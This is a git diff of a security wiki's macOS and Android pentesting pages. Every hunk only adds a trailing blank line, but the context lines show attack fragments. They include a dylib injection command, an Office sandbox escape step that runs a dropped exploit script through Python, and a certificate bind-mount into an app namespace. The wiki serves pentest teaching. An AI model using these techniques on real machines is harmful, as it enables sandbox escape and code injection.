diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/README.md index dfdeb6578..6381c9f65 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/README.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/README.md @@ -93,3 +93,4 @@ if ((csFlags & (cs_hard | cs_require_lv)) { ``` {{#include ../../../../../../banners/hacktricks-training.md}} + diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-xpc_connection_get_audit_token-attack.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-xpc_connection_get_audit_token-attack.md index 187ca2058..84d1ee2fe 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-xpc_connection_get_audit_token-attack.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-xpc_connection_get_audit_token-attack.md @@ -123,3 +123,4 @@ Below is a visual representation of the described attack scenario: - **Current Status**: The issue persists in iOS 17 and macOS 14, posing a challenge for those seeking to identify and understand it. {{#include ../../../../../../banners/hacktricks-training.md}} + diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/README.md index 8da2a111f..7343b0e6c 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/README.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/README.md @@ -337,3 +337,4 @@ DYLD_INSERT_LIBRARIES=inject.dylib ./hello-signed # Won't work - [**\*OS Internals, Volume I: User Mode. By Jonathan Levin**](https://www.amazon.com/MacOS-iOS-Internals-User-Mode/dp/099105556X) {{#include ../../../../banners/hacktricks-training.md}} + diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/macos-dyld-hijacking-and-dyld_insert_libraries.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/macos-dyld-hijacking-and-dyld_insert_libraries.md index be45064c8..74744e44a 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/macos-dyld-hijacking-and-dyld_insert_libraries.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/macos-dyld-hijacking-and-dyld_insert_libraries.md @@ -164,3 +164,4 @@ sudo log stream --style syslog --predicate 'eventMessage CONTAINS[c] "[+] dylib" ``` {{#include ../../../../banners/hacktricks-training.md}} + diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/macos-dyld-process.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/macos-dyld-process.md index 93e7d1e65..1989aa11a 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/macos-dyld-process.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/macos-dyld-process.md @@ -314,3 +314,4 @@ find . -type f | xargs grep strcmp| grep key,\ \" | cut -d'"' -f2 | sort -u - [**\*OS Internals, Volume I: User Mode. By Jonathan Levin**](https://www.amazon.com/MacOS-iOS-Internals-User-Mode/dp/099105556X) {{#include ../../../../banners/hacktricks-training.md}} + diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/README.md index 9ce9bf2db..fd30b58d7 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/README.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/README.md @@ -143,3 +143,4 @@ References and **more information about BTM**: - [https://support.apple.com/en-gb/guide/deployment/depdca572563/web](https://support.apple.com/en-gb/guide/deployment/depdca572563/web) {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-amfi-applemobilefileintegrity.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-amfi-applemobilefileintegrity.md index 0c3665345..7eb2003a4 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-amfi-applemobilefileintegrity.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-amfi-applemobilefileintegrity.md @@ -129,3 +129,4 @@ iOS AMFI maintains a lost of known hashes which are signed ad-hoc, called the ** - [**\*OS Internals Volume III**](https://newosxbook.com/home.html) {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-authorizations-db-and-authd.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-authorizations-db-and-authd.md index 11b5c6b55..9e360580c 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-authorizations-db-and-authd.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-authorizations-db-and-authd.md @@ -86,3 +86,4 @@ That will fork and exec `/usr/libexec/security_authtrampoline /bin/ls` as root,
{{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-code-signing.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-code-signing.md index 07fca74a2..f456ff871 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-code-signing.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-code-signing.md @@ -368,3 +368,4 @@ struct cs_blob { - [**\*OS Internals Volume III**](https://newosxbook.com/home.html) {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-dangerous-entitlements.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-dangerous-entitlements.md index 6b183b11a..c853e8e09 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-dangerous-entitlements.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-dangerous-entitlements.md @@ -169,3 +169,4 @@ Allow the process to **ask for all the TCC permissions**. {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/README.md index df6c78aa6..26701c276 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/README.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/README.md @@ -410,3 +410,4 @@ This feature is particularly useful for preventing certain classes of security v - [https://theevilbit.github.io/posts/exploiting_directory_permissions_on_macos/](https://theevilbit.github.io/posts/exploiting_directory_permissions_on_macos/) {{#include ../../../../banners/hacktricks-training.md}} + diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/macos-xattr-acls-extra-stuff.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/macos-xattr-acls-extra-stuff.md index 8cc183e72..fbc1d1b89 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/macos-xattr-acls-extra-stuff.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/macos-xattr-acls-extra-stuff.md @@ -180,3 +180,4 @@ xattr -l protected ``` {{#include ../../../../banners/hacktricks-training.md}} + diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper.md index b0bddd4c4..0a98594cb 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper.md @@ -480,3 +480,4 @@ In an ".app" bundle if the quarantine xattr is not added to it, when executing i {% embed url="https://websec.nl/" %} {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-launch-environment-constraints.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-launch-environment-constraints.md index 30babf70c..947edcbf6 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-launch-environment-constraints.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-launch-environment-constraints.md @@ -176,3 +176,4 @@ Even if it's required that the application has to be **opened by LaunchService** - [https://developer.apple.com/videos/play/wwdc2023/10266/](https://developer.apple.com/videos/play/wwdc2023/10266/) {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-macf-mandatory-access-control-framework.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-macf-mandatory-access-control-framework.md index f767669bb..7b02701eb 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-macf-mandatory-access-control-framework.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-macf-mandatory-access-control-framework.md @@ -251,3 +251,4 @@ __END_DECLS - [**\*OS Internals Volume III**](https://newosxbook.com/home.html) {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/README.md index 271e27110..e67d89c6c 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/README.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/README.md @@ -397,3 +397,4 @@ Sandbox also has a user daemon running exposing the XPC Mach service `com.apple. - [**\*OS Internals Volume III**](https://newosxbook.com/home.html) {{#include ../../../../banners/hacktricks-training.md}} + diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-default-sandbox-debug.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-default-sandbox-debug.md index 380f3c5c7..35f243e67 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-default-sandbox-debug.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-default-sandbox-debug.md @@ -113,3 +113,4 @@ codesign --remove-signature SandboxedShellApp.app ``` {{#include ../../../../banners/hacktricks-training.md}} + diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/README.md index 222490750..cc1895d06 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/README.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/README.md @@ -322,3 +322,4 @@ Process 2517 exited with status = 0 (0x00000000) - [https://www.youtube.com/watch?v=mG715HcDgO8](https://www.youtube.com/watch?v=mG715HcDgO8) {{#include ../../../../../banners/hacktricks-training.md}} + diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/macos-office-sandbox-bypasses.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/macos-office-sandbox-bypasses.md index 714745f6a..cb61d262e 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/macos-office-sandbox-bypasses.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/macos-office-sandbox-bypasses.md @@ -50,3 +50,4 @@ The thing is that even if **`python`** was signed by Apple, it **won't execute** 2. Run _open_ **`–stdin='~$exploit.py' -a Python`**, which runs the Python app with our dropped file serving as its standard input. Python happily runs our code, and since it’s a child process of _launchd_, it isn’t bound to Word’s sandbox rules. {{#include ../../../../../banners/hacktricks-training.md}} + diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sip.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sip.md index 05fc04453..fb388bc9a 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sip.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sip.md @@ -279,3 +279,4 @@ mount ``` {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/README.md index 1def37e64..f917d3d9a 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/README.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/README.md @@ -602,3 +602,4 @@ macos-tcc-bypasses/ - [**https://www.sentinelone.com/labs/bypassing-macos-tcc-user-privacy-protections-by-accident-and-design/**](https://www.sentinelone.com/labs/bypassing-macos-tcc-user-privacy-protections-by-accident-and-design/) {{#include ../../../../banners/hacktricks-training.md}} + diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-apple-events.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-apple-events.md index c4e9b780e..5c17faef6 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-apple-events.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-apple-events.md @@ -20,3 +20,4 @@ Sandboxed applications requires privileges like `allow appleevent-send` and `(al > ``` {{#include ../../../../banners/hacktricks-training.md}} + diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/README.md index 61c0782d8..dee8edfb3 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/README.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/README.md @@ -528,3 +528,4 @@ Another way using [**CoreGraphics events**](https://objectivebythesea.org/v2/tal - [**Knockout Win Against TCC - 20+ NEW Ways to Bypass Your MacOS Privacy Mechanisms**](https://www.youtube.com/watch?v=a9hsxPdRxsY) {{#include ../../../../../banners/hacktricks-training.md}} + diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/macos-apple-scripts.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/macos-apple-scripts.md index 29155bcab..0775b0ec6 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/macos-apple-scripts.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/macos-apple-scripts.md @@ -32,3 +32,4 @@ and tin this case the content cannot be decompiled even with `osadecompile` However, there are still some tools that can be used to understand this kind of executables, [**read this research for more info**](https://labs.sentinelone.com/fade-dead-adventures-in-reversing-malicious-run-only-applescripts/)). The tool [**applescript-disassembler**](https://github.com/Jinmo/applescript-disassembler) with [**aevt_decompile**](https://github.com/SentineLabs/aevt_decompile) will be very useful to understand how the script works. {{#include ../../../../../banners/hacktricks-training.md}} + diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-payloads.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-payloads.md index 5f23b2d4e..f2f2e91af 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-payloads.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-payloads.md @@ -928,3 +928,4 @@ int main() { > [!CAUTION] > **Accessibility is a very powerful permission**, you could abuse it in other ways, for example you could perform the **keystrokes attack** just from it without needed to call System Events. {{#include ../../../../banners/hacktricks-training.md}} + diff --git a/src/misc/references.md b/src/misc/references.md index 9e5dd6281..cbb355a3a 100644 --- a/src/misc/references.md +++ b/src/misc/references.md @@ -47,3 +47,4 @@ {% embed url="https://ippsec.rocks/" %} {{#include ../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/android-app-pentesting/README.md b/src/mobile-pentesting/android-app-pentesting/README.md index 83fcc581f..065947ed6 100644 --- a/src/mobile-pentesting/android-app-pentesting/README.md +++ b/src/mobile-pentesting/android-app-pentesting/README.md @@ -831,3 +831,4 @@ Stay informed with the newest bug bounties launching and crucial platform update **Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today! {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/android-app-pentesting/adb-commands.md b/src/mobile-pentesting/android-app-pentesting/adb-commands.md index 1adf0902a..6184e65c8 100644 --- a/src/mobile-pentesting/android-app-pentesting/adb-commands.md +++ b/src/mobile-pentesting/android-app-pentesting/adb-commands.md @@ -352,3 +352,4 @@ If you want to inspect the content of the backup: ``` {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/android-app-pentesting/android-applications-basics.md b/src/mobile-pentesting/android-app-pentesting/android-applications-basics.md index 2422eaae4..ca6ed4e26 100644 --- a/src/mobile-pentesting/android-app-pentesting/android-applications-basics.md +++ b/src/mobile-pentesting/android-app-pentesting/android-applications-basics.md @@ -396,3 +396,4 @@ if (dpm.isAdminActive(adminComponent)) { ``` {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/android-app-pentesting/android-task-hijacking.md b/src/mobile-pentesting/android-app-pentesting/android-task-hijacking.md index 9e5ca590a..d5b76db0e 100644 --- a/src/mobile-pentesting/android-app-pentesting/android-task-hijacking.md +++ b/src/mobile-pentesting/android-app-pentesting/android-task-hijacking.md @@ -45,3 +45,4 @@ To prevent such attacks, developers can set `taskAffinity` to an empty string an - [**https://blog.takemyhand.xyz/2021/02/android-task-hijacking-with.html**](https://blog.takemyhand.xyz/2021/02/android-task-hijacking-with.html) {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/android-app-pentesting/apk-decompilers.md b/src/mobile-pentesting/android-app-pentesting/apk-decompilers.md index e39f36193..dc9f0a987 100644 --- a/src/mobile-pentesting/android-app-pentesting/apk-decompilers.md +++ b/src/mobile-pentesting/android-app-pentesting/apk-decompilers.md @@ -60,3 +60,4 @@ For straightforward decompilation with **procyon**: This tool can be used to dump the DEX of a running APK in memory. This helps to beat static obfuscation that is removed while the application is executed in memory. {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/android-app-pentesting/avd-android-virtual-device.md b/src/mobile-pentesting/android-app-pentesting/avd-android-virtual-device.md index ef49da07c..7481595ad 100644 --- a/src/mobile-pentesting/android-app-pentesting/avd-android-virtual-device.md +++ b/src/mobile-pentesting/android-app-pentesting/avd-android-virtual-device.md @@ -228,3 +228,4 @@ You can **use the GUI** to take a snapshot of the VM at any time: ![](<../../images/image (234).png>) {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/android-app-pentesting/bypass-biometric-authentication-android.md b/src/mobile-pentesting/android-app-pentesting/bypass-biometric-authentication-android.md index 4616930ef..1c2fc23ae 100644 --- a/src/mobile-pentesting/android-app-pentesting/bypass-biometric-authentication-android.md +++ b/src/mobile-pentesting/android-app-pentesting/bypass-biometric-authentication-android.md @@ -86,3 +86,4 @@ Deepen your expertise in **Mobile Security** with 8kSec Academy. Master iOS and {% embed url="https://academy.8ksec.io/" %} {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/android-app-pentesting/content-protocol.md b/src/mobile-pentesting/android-app-pentesting/content-protocol.md index 7dda74320..24375d8cb 100644 --- a/src/mobile-pentesting/android-app-pentesting/content-protocol.md +++ b/src/mobile-pentesting/android-app-pentesting/content-protocol.md @@ -96,3 +96,4 @@ Proof-of-Concept HTML: {% embed url="https://websec.nl/" %} {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/android-app-pentesting/drozer-tutorial/README.md b/src/mobile-pentesting/android-app-pentesting/drozer-tutorial/README.md index 3bf7f0ea2..f810076f0 100644 --- a/src/mobile-pentesting/android-app-pentesting/drozer-tutorial/README.md +++ b/src/mobile-pentesting/android-app-pentesting/drozer-tutorial/README.md @@ -305,3 +305,4 @@ run app.package.debuggable {% embed url="https://go.intigriti.com/hacktricks" %} {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md b/src/mobile-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md index c1c577ca3..59373a020 100644 --- a/src/mobile-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md +++ b/src/mobile-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md @@ -200,3 +200,4 @@ Vulnerable Providers: - [https://labs.withsecure.com/content/dam/labs/docs/mwri-drozer-user-guide-2015-03-23.pdf](https://labs.withsecure.com/content/dam/labs/docs/mwri-drozer-user-guide-2015-03-23.pdf) {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/android-app-pentesting/exploiting-a-debuggeable-applciation.md b/src/mobile-pentesting/android-app-pentesting/exploiting-a-debuggeable-applciation.md index 87285bffc..c50f2b121 100644 --- a/src/mobile-pentesting/android-app-pentesting/exploiting-a-debuggeable-applciation.md +++ b/src/mobile-pentesting/android-app-pentesting/exploiting-a-debuggeable-applciation.md @@ -89,3 +89,4 @@ This example demonstrated how the behavior of a debuggable application can be ma - [https://resources.infosecinstitute.com/android-hacking-security-part-6-exploiting-debuggable-android-applications](https://resources.infosecinstitute.com/android-hacking-security-part-6-exploiting-debuggable-android-applications) {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/android-app-pentesting/frida-tutorial/README.md b/src/mobile-pentesting/android-app-pentesting/frida-tutorial/README.md index 5a7725aee..fca5557a3 100644 --- a/src/mobile-pentesting/android-app-pentesting/frida-tutorial/README.md +++ b/src/mobile-pentesting/android-app-pentesting/frida-tutorial/README.md @@ -213,3 +213,4 @@ Java.choose("com.example.a11x256.frida_test.my_activity", { {% embed url="https://go.intigriti.com/hacktricks" %} {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-1.md b/src/mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-1.md index e41d5b1ee..ed1cdd659 100644 --- a/src/mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-1.md +++ b/src/mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-1.md @@ -145,3 +145,4 @@ You can see that in [the next tutorial](frida-tutorial-2.md). {% embed url="https://go.intigriti.com/hacktricks" %} {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-2.md b/src/mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-2.md index 0a3687cca..6c36503b0 100644 --- a/src/mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-2.md +++ b/src/mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-2.md @@ -229,3 +229,4 @@ There is a part 5 that I am not going to explain because there isn't anything ne {% embed url="https://go.intigriti.com/hacktricks" %} {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.md b/src/mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.md index 50132feb4..08894bc30 100644 --- a/src/mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.md +++ b/src/mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.md @@ -286,3 +286,4 @@ exit {% embed url="https://go.intigriti.com/hacktricks" %} {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/android-app-pentesting/frida-tutorial/owaspuncrackable-1.md b/src/mobile-pentesting/android-app-pentesting/frida-tutorial/owaspuncrackable-1.md index 4b6a54ae9..5c8d9c4c2 100644 --- a/src/mobile-pentesting/android-app-pentesting/frida-tutorial/owaspuncrackable-1.md +++ b/src/mobile-pentesting/android-app-pentesting/frida-tutorial/owaspuncrackable-1.md @@ -131,3 +131,4 @@ Java.perform(function () { {% embed url="https://go.intigriti.com/hacktricks" %} {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/android-app-pentesting/google-ctf-2018-shall-we-play-a-game.md b/src/mobile-pentesting/android-app-pentesting/google-ctf-2018-shall-we-play-a-game.md index 5e511419b..b6770005e 100644 --- a/src/mobile-pentesting/android-app-pentesting/google-ctf-2018-shall-we-play-a-game.md +++ b/src/mobile-pentesting/android-app-pentesting/google-ctf-2018-shall-we-play-a-game.md @@ -67,3 +67,4 @@ Make the application run the loop 100000 times when you win the first time. To d You need to do this inside a physical device as (I don't know why) this doesn't work in an emulated device. {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/android-app-pentesting/install-burp-certificate.md b/src/mobile-pentesting/android-app-pentesting/install-burp-certificate.md index b199f5f6c..69ae3762b 100644 --- a/src/mobile-pentesting/android-app-pentesting/install-burp-certificate.md +++ b/src/mobile-pentesting/android-app-pentesting/install-burp-certificate.md @@ -158,3 +158,4 @@ nsenter --mount=/proc/$APP_PID/ns/mnt -- /bin/mount --bind /system/etc/security/ {% embed url="https://websec.nl/" %} {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/android-app-pentesting/intent-injection.md b/src/mobile-pentesting/android-app-pentesting/intent-injection.md index 2735fc072..2fb97c6dc 100644 --- a/src/mobile-pentesting/android-app-pentesting/intent-injection.md +++ b/src/mobile-pentesting/android-app-pentesting/intent-injection.md @@ -3,3 +3,4 @@ **Take a look to: [https://blog.oversecured.com/Android-Access-to-app-protected-components/](https://blog.oversecured.com/Android-Access-to-app-protected-components/)** {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/android-app-pentesting/make-apk-accept-ca-certificate.md b/src/mobile-pentesting/android-app-pentesting/make-apk-accept-ca-certificate.md index f6c85d8c1..434e0a983 100644 --- a/src/mobile-pentesting/android-app-pentesting/make-apk-accept-ca-certificate.md +++ b/src/mobile-pentesting/android-app-pentesting/make-apk-accept-ca-certificate.md @@ -46,3 +46,4 @@ Then save the file & back out of all the directories & rebuild the apk with the Finally, you need just to **sign the new application**. [Read this section of the page Smali - Decompiling/\[Modifying\]/Compiling to learn how to sign it](smali-changes.md#sing-the-new-apk). {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/android-app-pentesting/manual-deobfuscation.md b/src/mobile-pentesting/android-app-pentesting/manual-deobfuscation.md index 093111835..dcd070ffb 100644 --- a/src/mobile-pentesting/android-app-pentesting/manual-deobfuscation.md +++ b/src/mobile-pentesting/android-app-pentesting/manual-deobfuscation.md @@ -38,3 +38,4 @@ By executing the code in a controlled environment, dynamic analysis **allows for - This talk discusses a series of obfuscation techniques, solely in Java code, that an Android botnet was using to hide its behavior. {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/android-app-pentesting/react-native-application.md b/src/mobile-pentesting/android-app-pentesting/react-native-application.md index 4cd9bafda..d13114bff 100644 --- a/src/mobile-pentesting/android-app-pentesting/react-native-application.md +++ b/src/mobile-pentesting/android-app-pentesting/react-native-application.md @@ -39,3 +39,4 @@ To search for sensitive credentials and endpoints, follow these steps: - [https://medium.com/bugbountywriteup/lets-know-how-i-have-explored-the-buried-secrets-in-react-native-application-6236728198f7](https://medium.com/bugbountywriteup/lets-know-how-i-have-explored-the-buried-secrets-in-react-native-application-6236728198f7) {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/android-app-pentesting/reversing-native-libraries.md b/src/mobile-pentesting/android-app-pentesting/reversing-native-libraries.md index 9863ec05a..fa0d8fafc 100644 --- a/src/mobile-pentesting/android-app-pentesting/reversing-native-libraries.md +++ b/src/mobile-pentesting/android-app-pentesting/reversing-native-libraries.md @@ -54,3 +54,4 @@ Deepen your expertise in **Mobile Security** with 8kSec Academy. Master iOS and {% embed 